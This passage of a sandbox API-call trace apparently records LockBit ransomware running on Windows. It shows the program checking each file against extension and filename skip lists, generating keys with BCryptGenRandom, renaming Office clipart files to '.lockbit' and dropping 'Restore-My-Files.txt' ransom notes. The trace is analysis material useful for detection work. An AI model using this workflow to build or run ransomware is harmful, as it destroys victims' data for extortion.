files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.594] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2016, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02025_.WMF", cAlternateFileName="")) returned 1 [0176.594] lstrcmpiW (lpString1=".", lpString2="SO02025_.WMF") returned -1 [0176.594] lstrcmpiW (lpString1="..", lpString2="SO02025_.WMF") returned -1 [0176.594] PathFindExtensionW (pszPath="SO02025_.WMF") returned=".WMF" [0176.595] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.595] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.596] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.596] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02025_.WMF") returned -1 [0176.596] lstrcmpiW (lpString1="ntldr", lpString2="SO02025_.WMF") returned -1 [0176.596] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02025_.WMF") returned -1 [0176.596] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02025_.WMF") returned -1 [0176.596] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02025_.WMF") returned -1 [0176.596] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02025_.WMF") returned 1 [0176.597] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02025_.WMF") returned -1 [0176.597] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.597] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02025_.WMF") returned=".WMF" [0176.597] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.597] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.597] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.598] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.598] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.598] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.598] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.598] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02025_.WMF.lockbit") returned 72 [0176.598] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02025_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02025_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0176.599] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.599] malloc (_Size=0x40068) returned 0x1ff1e60 [0176.599] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8214) returned 1 [0176.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.599] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0176.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.600] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0176.600] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.604] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02025_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02025_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.604] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.604] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.605] free (_Block=0x1fa2ed8) [0176.605] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02025_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.605] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.605] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.605] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x24c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02028_.WMF", cAlternateFileName="")) returned 1 [0176.606] lstrcmpiW (lpString1=".", lpString2="SO02028_.WMF") returned -1 [0176.606] lstrcmpiW (lpString1="..", lpString2="SO02028_.WMF") returned -1 [0176.606] PathFindExtensionW (pszPath="SO02028_.WMF") returned=".WMF" [0176.606] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.606] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.607] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.607] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02028_.WMF") returned -1 [0176.607] lstrcmpiW (lpString1="ntldr", lpString2="SO02028_.WMF") returned -1 [0176.608] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02028_.WMF") returned -1 [0176.608] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02028_.WMF") returned -1 [0176.608] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02028_.WMF") returned -1 [0176.608] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02028_.WMF") returned 1 [0176.608] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02028_.WMF") returned -1 [0176.608] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.608] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02028_.WMF") returned=".WMF" [0176.608] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.608] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.608] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.609] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.609] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.609] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.609] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.609] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.609] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.609] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.609] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.609] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.609] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02028_.WMF.lockbit") returned 72 [0176.609] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02028_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02028_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0176.610] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.610] malloc (_Size=0x40068) returned 0x3ef0008 [0176.610] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=9416) returned 1 [0176.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.610] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0176.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.611] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0176.611] ReadFile (in: hFile=0x338, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0176.615] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02028_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02028_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.615] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.615] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.616] free (_Block=0x1fa2ed8) [0176.616] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02028_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.616] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.617] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.617] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x266c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02045_.WMF", cAlternateFileName="")) returned 1 [0176.617] lstrcmpiW (lpString1=".", lpString2="SO02045_.WMF") returned -1 [0176.617] lstrcmpiW (lpString1="..", lpString2="SO02045_.WMF") returned -1 [0176.617] PathFindExtensionW (pszPath="SO02045_.WMF") returned=".WMF" [0176.617] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.617] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.618] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.618] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02045_.WMF") returned -1 [0176.619] lstrcmpiW (lpString1="ntldr", lpString2="SO02045_.WMF") returned -1 [0176.619] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02045_.WMF") returned -1 [0176.619] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02045_.WMF") returned -1 [0176.619] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02045_.WMF") returned -1 [0176.619] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02045_.WMF") returned 1 [0176.619] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02045_.WMF") returned -1 [0176.619] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.619] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02045_.WMF") returned=".WMF" [0176.619] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.619] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.619] lstrcmpiW (lpString1=".frm", lpString2=".WMF") 